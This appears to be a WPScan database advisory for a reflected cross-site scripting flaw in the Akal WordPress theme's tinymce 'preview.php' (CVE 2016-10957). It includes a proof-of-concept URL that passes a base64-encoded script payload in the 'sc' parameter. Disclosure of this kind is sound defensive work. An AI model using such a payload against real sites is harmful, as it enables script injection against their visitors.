Akal Theme - Reflected Cross-Site Scripting (XSS)



Description
The premium theme, Akal, suffers from a Reflected Cross-Site Scripting (XSS) vulnerability in the preview.php file located in framework/brad-shortcodes/tinymce.
Proof of Concept
http://example.com/wp-content/themes/akal/framework/brad-shortcodes/tinymce/preview.php?sc=PHNjcmlwdD5hbGVydCgieHNzIDwvc2NyaXB0JTNFIik8L3NjcmlwdD4=

Affects Theme

References

CVE 2016-10957
URL https://www.saotn.org/wordpress-advisory-akal-theme-xss-vulnerability

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Jan Reilink
Submitter Website https://www.saotn.org
Submitter Twitter @hertogjanr
Views 7035
Verified No
WPVDB ID 8607

Timeline

Publicly Published 2016-08-22 (about 3 years ago)
Added 2016-08-22 (about 3 years ago)
Last Updated 2019-11-01 (12 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin